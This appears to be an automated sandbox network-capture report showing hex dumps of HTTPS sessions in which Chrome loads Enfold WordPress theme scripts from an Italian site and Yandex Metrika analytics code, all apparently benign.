                                                                                                                                              Data Ascii: r f=!!d._informer;d._informer=A({domain:"informer.yandex.ru"},c);f||Ke(a,{src:e+"//informer.yandex.ru/metrika/informer.js"})}}function xo(a,b){var c=ib(a),d=c.C,e=c.D;if(""===d("cc")){e("cc",0);var f=na(a),g=K(a);va(a,"6",b)({N:{cb:!0,Zc:!1}},["https://mc
                                                                                                                                              2025-01-03 16:33:05 UTC8168INData Raw: 64 29 26 26 21 52 28 61 2e 64 61 74 61 29 7d 66 75 6e 63 74 69 6f 6e 20 64 62 28 61 2c 62 2c 63 29 7b 62 3d 55 2e 63 61 6c 6c 28 74 68 69 73 2c 61 2c 62 2c 63 29 7c 7c 74 68 69 73 3b 62 2e 6d 62 3d 7b 7d 3b 62 2e 4e 61 3d 30 3b 62 2e 45 61 3d 5b 5d 3b 62 2e 6a 67 3d 5b 5d 3b 62 2e 6b 63 3d 30 3b 62 2e 4f 66 3d 30 3b 62 2e 68 61 2e 70 75 73 68 28 5b 5b 22 6b 65 79 64 6f 77 6e 22 5d 2c 62 2e 4d 68 5d 29 3b 62 2e 68 61 2e 70 75 73 68 28 5b 5b 22 6b 65 79 75 70 22 5d 2c 62 2e 4e 68 5d 29 3b 62 2e 47 67 3d 2d 31 21 3d 3d 78 63 28 6e 28 61 2c 22 6e 61 76 69 67 61 74 6f 72 2e 61 70 70 56 65 72 73 69 6f 6e 22 29 7c 7c 22 22 2c 22 4d 61 63 22 29 3f 22 31 22 3a 22 32 22 3b 62 2e 43 63 3d 62 2e 4c 2e 4a 28 62 2e 43 63 2c 22 76 22 29 3b 62 2e 75 64 3d 62 2e 4c 2e 4a
                                                                                                                                              Data Ascii: d)&&!R(a.data)}function db(a,b,c){b=U.call(this,a,b,c)||this;b.mb={};b.Na=0;b.Ea=[];b.jg=[];b.kc=0;b.Of=0;b.ha.push([["keydown"],b.Mh]);b.ha.push([["keyup"],b.Nh]);b.Gg=-1!==xc(n(a,"navigator.appVersion")||"","Mac")?"1":"2";b.Cc=b.L.J(b.Cc,"v");b.ud=b.L.J
                                                                                                                                              2025-01-03 16:33:06 UTC8168INData Raw: 26 6c 70 2e 74 65 73 74 28 67 7c 7c 22 22 29 29 3b 65 3d 67 3b 72 65 74 75 72 6e 7b 57 61 3a 21 66 26 26 28 78 67 28 61 2c 62 29 7c 7c 65 26 26 63 7c 7c 65 26 26 21 64 26 26 21 63 29 2c 68 62 3a 66 2c 71 62 3a 65 7d 7d 66 75 6e 63 74 69 6f 6e 20 78 67 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 74 67 28 61 2c 62 29 7c 7c 51 64 28 61 2c 62 29 3f 21 30 3a 4f 64 28 61 2c 62 29 7d 66 75 6e 63 74 69 6f 6e 20 63 6a 28 61 29 7b 72 65 74 75 72 6e 21 21 28 61 26 26 32 3c 61 2e 6c 65 6e 67 74 68 29 7d 66 75 6e 63 74 69 6f 6e 20 73 67 28 61 29 7b 74 72 79 7b 76 61 72 20 62 3d 4e 61 28 61 29 3b 69 66 28 48 28 62 2c 79 67 29 29 7b 69 66 28 22 49 4e 50 55 54 22 3d 3d 3d 62 29 7b 76 61 72 20 63 3d 61 2e 74 79 70 65 3b 72 65 74 75 72 6e 21 63 7c 7c 48 28 63 2e 74 6f 4c 6f 63
                                                                                                                                              Data Ascii: &lp.test(g||""));e=g;return{Wa:!f&&(xg(a,b)||e&&c||e&&!d&&!c),hb:f,qb:e}}function xg(a,b){return tg(a,b)||Qd(a,b)?!0:Od(a,b)}function cj(a){return!!(a&&2<a.length)}function sg(a){try{var b=Na(a);if(H(b,yg)){if("INPUT"===b){var c=a.type;return!c||H(c.toLoc
                                                                                                                                              2025-01-03 16:33:06 UTC8168INData Raw: 74 22 2c 64 2e 73 74 79 6c 65 63 68 61 6e 67 65 3d 22 73 74 79 6c 65 43 68 61 6e 67 65 45 76 65 6e 74 22 2c 64 2e 66 61 74 61 6c 45 72 72 6f 72 3d 22 66 61 74 61 6c 45 72 72 6f 72 45 76 65 6e 74 22 2c 64 2e 70 61 67 65 44 61 74 61 3d 22 70 61 67 65 22 2c 64 29 3b 74 68 69 73 2e 42 68 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 66 3d 65 2e 74 79 70 65 3b 72 65 74 75 72 6e 20 65 2e 65 76 65 6e 74 7c 7c 22 70 75 62 6c 69 73 68 65 72 73 48 65 61 64 65 72 22 21 3d 3d 66 26 26 22 61 72 74 69 63 6c 65 49 6e 66 6f 22 21 3d 3d 66 3f 7b 74 79 70 65 3a 6e 6a 5b 66 5d 2c 65 76 65 6e 74 3a 6f 6a 5b 63 2e 69 68 5b 65 2e 65 76 65 6e 74 5d 7c 7c 65 2e 65 76 65 6e 74 5d 7d 3a 7b 74 79 70 65 3a 6e 6a 2e 70 75 62 6c 69 73 68 65 72 73 2c 65 76 65 6e 74 3a 6f 6a 5b 66
                                                                                                                                              Data Ascii: t",d.stylechange="styleChangeEvent",d.fatalError="fatalErrorEvent",d.pageData="page",d);this.Bh=function(e){var f=e.type;return e.event||"publishersHeader"!==f&&"articleInfo"!==f?{type:nj[f],event:oj[c.ih[e.event]||e.event]}:{type:nj.publishers,event:oj[f
                                                                                                                                              2025-01-03 16:33:06 UTC8168INData Raw: 72 6e 20 73 71 28 66 28 41 28 7b 4e 3a 7b 5a 63 3a 21 31 2c 51 63 3a 21 30 7d 7d 2c 43 6a 29 2c 45 28 66 75 6e 63 74 69 6f 6e 28 68 29 7b 76 61 72 20 6b 3d 75 28 68 29 2c 6c 3d 6b 2e 6e 65 78 74 28 29 2e 76 61 6c 75 65 3b 68 3d 6b 2e 6e 65 78 74 28 29 2e 76 61 6c 75 65 3b 6b 3d 6b 2e 6e 65 78 74 28 29 2e 76 61 6c 75 65 3b 6c 3d 51 28 22 22 2c 45 28 66 75 6e 63 74 69 6f 6e 28 6d 29 7b 72 65 74 75 72 6e 20 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6d 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 2b 31 30 29 7d 2c 6c 2e 73 70 6c 69 74 28 22 22 29 29 29 3b 72 65 74 75 72 6e 22 68 74 74 70 22 2b 28 6b 3f 22 73 22 3a 22 22 29 2b 22 3a 2f 2f 22 2b 6c 2b 22 3a 22 2b 68 2b 22 2f 22 2b 74 71 5b 64 5d 7d 2c 67 29 29 2e 74 68 65 6e 28 66 75 6e 63 74 69
                                                                                                                                              Data Ascii: rn sq(f(A({N:{Zc:!1,Qc:!0}},Cj),E(function(h){var k=u(h),l=k.next().value;h=k.next().value;k=k.next().value;l=Q("",E(function(m){return String.fromCharCode(m.charCodeAt(0)+10)},l.split("")));return"http"+(k?"s":"")+"://"+l+":"+h+"/"+tq[d]},g)).then(functi
                                                                                                                                              2025-01-03 16:33:06 UTC8168INData Raw: 65 3d 51 61 28 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 64 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 56 61 28 65 29 29 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 59 71 28 61 2c 62 2c 63 2c 64 29 7b 76 61 72 20 65 3d 6e 28 64 2c 22 74 61 72 67 65 74 22 29 3b 65 26 26 28 64 3d 6e 28 64 2c 22 69 73 54 72 75 73 74 65 64 22 29 2c 28 65 3d 6a 63 28 22 62 75 74 74 6f 6e 2c 69 6e 70 75 74 22 2c 61 2c 65 29 29 26 26 22 73 75 62 6d 69 74 22 3d 3d 3d 65 2e 74 79 70 65 26 26 28 65 3d 5a 71 28 61 2c 65 29 29 29 26 26 28 63 2e 70 75 73 68 28 65 29 2c 58 28 61 2c 46 28 5b 21 31 2c 61 2c 62 2c 63 2c 65 2c 64 5d 2c 4c 6a 29 2c 33 30 30 29 29 7d 66 75 6e 63 74 69 6f 6e 20 4c 6a 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 76 61 72 20 67 3d 59 62 28 62 29 28 65 2c 0a 64 29 2c
                                                                                                                                              Data Ascii: e=Qa(arguments);return d.apply(null,Va(e))}}}function Yq(a,b,c,d){var e=n(d,"target");e&&(d=n(d,"isTrusted"),(e=jc("button,input",a,e))&&"submit"===e.type&&(e=Zq(a,e)))&&(c.push(e),X(a,F([!1,a,b,c,e,d],Lj),300))}function Lj(a,b,c,d,e,f){var g=Yb(b)(e,d),


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              112192.168.2.164984489.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:05 UTC507OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/headline_rotator/headline_rotator.js?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
                                                                                                                                              2025-01-03 16:33:05 UTC276INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:05 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 4975
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:30 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:05 UTC4975INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 24 29 0a 7b 20 0a 09 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 09 0a 09 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 09 2f 2f 20 41 76 69 61 20 54 65 78 74 20 52 6f 74 61 74 6f 72 0a 09 2f 2f 20 0a 09 2f 2f 20 61 63 63 6f 72 64 69 6f 6e 20 73 6c 69 64 65 72 20 73 63 72 69 70 74 0a 09 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d
                                                                                                                                              Data Ascii: (function($){ "use strict";// -------------------------------------------------------------------------------------------// Avia Text Rotator// // accordion slider script// -------------------------------------------------------------------


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              113192.168.2.164983889.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:05 UTC664OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/menu/menu.js?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
                                                                                                                                              2025-01-03 16:33:05 UTC276INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:05 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 3874
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:31 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:05 UTC3874INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 24 29 0a 7b 20 0a 09 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 09 24 2e 61 76 69 61 5f 75 74 69 6c 69 74 69 65 73 20 3d 20 24 2e 61 76 69 61 5f 75 74 69 6c 69 74 69 65 73 20 7c 7c 20 7b 7d 3b 0a 09 0a 09 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 0a 20 20 20 20 7b 09 0a 09 09 20 2f 2f 61 63 74 69 76 61 74 65 73 20 74 68 65 20 73 74 69 63 6b 79 20 73 75 62 6d 65 6e 75 0a 09 09 24 2e 61 76 69 61 5f 75 74 69 6c 69 74 69 65 73 20 3d 20 24 2e 61 76 69 61 5f 75 74 69 6c 69 74 69 65 73 20 7c 7c 20 7b 7d 3b 0a 20 20 20 20 20 20 20 20 69 66 28 24 2e 61 76 69 61 5f 75 74 69 6c 69 74 69 65 73 2e 61 76 69 61 5f 73 74 69 63 6b 79 5f 73 75 62 6d 65 6e 75 29 0a 09 09 24 2e 61 76 69 61 5f 75 74 69 6c
                                                                                                                                              Data Ascii: (function($){ "use strict";$.avia_utilities = $.avia_utilities || {};$(document).ready(function() { //activates the sticky submenu$.avia_utilities = $.avia_utilities || {}; if($.avia_utilities.avia_sticky_submenu)$.avia_util


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              114192.168.2.164984389.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:05 UTC491OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/icongrid/icongrid.js?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
                                                                                                                                              2025-01-03 16:33:05 UTC276INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:05 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 1848
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:30 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:05 UTC1848INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 24 29 0a 7b 20 0a 09 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 0a 20 20 20 20 24 28 77 69 6e 64 6f 77 29 2e 6f 6e 28 27 6c 6f 61 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 65 29 20 7b 0a 09 09 24 28 27 2e 61 76 69 61 2d 69 63 6f 6e 67 72 69 64 2d 66 6c 69 70 62 6f 78 27 29 2e 61 76 69 61 5f 73 63 5f 69 63 6f 6e 67 72 69 64 28 29 3b 0a 20 20 20 20 7d 29 3b 0a 09 0a 09 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 09 2f 2f 20 49 63 6f 6e 67 72 69 64 20 73 68 6f 72 74 63 6f 64 65 20 6a 61 76 61
                                                                                                                                              Data Ascii: (function($){ "use strict"; $(window).on('load', function (e) {$('.avia-icongrid-flipbox').avia_sc_icongrid(); });// -------------------------------------------------------------------------------------------// Icongrid shortcode java


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              115192.168.2.164984789.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:05 UTC727OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/notification/notification.js?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
                                                                                                                                              2025-01-03 16:33:05 UTC276INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:05 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 2996
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:31 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:05 UTC2996INData Raw: 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 2f 2f 20 4d 65 73 73 61 67 65 20 42 6f 78 0a 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 0a 28 66 75 6e 63 74 69 6f 6e 28 24 29 0a 7b 0a 20 20 20 20 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 0a 20 20 20 20 24 2e 66 6e 2e 61 76 69 61 5f 73
                                                                                                                                              Data Ascii: // -------------------------------------------------------------------------------------------// Message Box// -------------------------------------------------------------------------------------------(function($){ "use strict"; $.fn.avia_s


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              116192.168.2.164984589.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:05 UTC717OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/numbers/numbers.js?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
                                                                                                                                              2025-01-03 16:33:05 UTC276INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:05 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 2974
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:31 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:05 UTC2974INData Raw: 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 2f 2f 20 42 69 67 20 4e 75 6d 62 65 72 20 61 6e 69 6d 61 74 69 6f 6e 20 73 68 6f 72 74 63 6f 64 65 20 6a 61 76 61 73 63 72 69 70 74 0a 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 0a 28 66 75 6e 63 74 69 6f 6e 28 24 29 0a 7b 0a 09 2f 2f 20
                                                                                                                                              Data Ascii: // -------------------------------------------------------------------------------------------// Big Number animation shortcode javascript// -------------------------------------------------------------------------------------------(function($){//


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              117192.168.2.164984887.250.251.1194436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:05 UTC726OUTGET /metrika/metrika_match.html HTTP/1.1
                                                                                                                                              Host: mc.yandex.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                                              Sec-Fetch-User: ?1
                                                                                                                                              Sec-Fetch-Dest: iframe
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:33:05 UTC1316INHTTP/1.1 200 OK
                                                                                                                                              Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                              Cache-Control: max-age=3600
                                                                                                                                              Connection: Close
                                                                                                                                              Content-Length: 5498
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:05 GMT
                                                                                                                                              ETag: "67655eba-157a"
                                                                                                                                              Expires: Fri, 03 Jan 2025 17:33:05 GMT
                                                                                                                                              Last-Modified: Fri, 20 Dec 2024 12:10:34 GMT
                                                                                                                                              Set-Cookie: _yasc=E+Hf+1VqZ9A3TmZDDpthWzghsC2o8l8QIB3cpHQSbzqbS8trQEvh5hWwey6b6RwmqdM=; domain=.yandex.com; path=/; expires=Mon, 01 Jan 2035 16:33:05 GMT; secure
                                                                                                                                              Set-Cookie: i=narlABsq63nROyU6LhKlC/QyBgl1C5gTK9qc3JdRc3H3zDytph2vBN10ZgqZgH/k820S88p65t19wIhYvE7/vXqicU8=; Expires=Sun, 03-Jan-2027 16:33:05 GMT; Domain=.yandex.com; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                              Set-Cookie: yandexuid=8563067781735921985; Expires=Sun, 03-Jan-2027 16:33:05 GMT; Domain=.yandex.com; Path=/; Secure; SameSite=None
                                                                                                                                              Set-Cookie: yashr=2978277861735921985; Path=/; Domain=.yandex.com; Expires=Sat, 03 Jan 2026 16:33:05 GMT; SameSite=None; Secure; HttpOnly
                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                              Timing-Allow-Origin: *
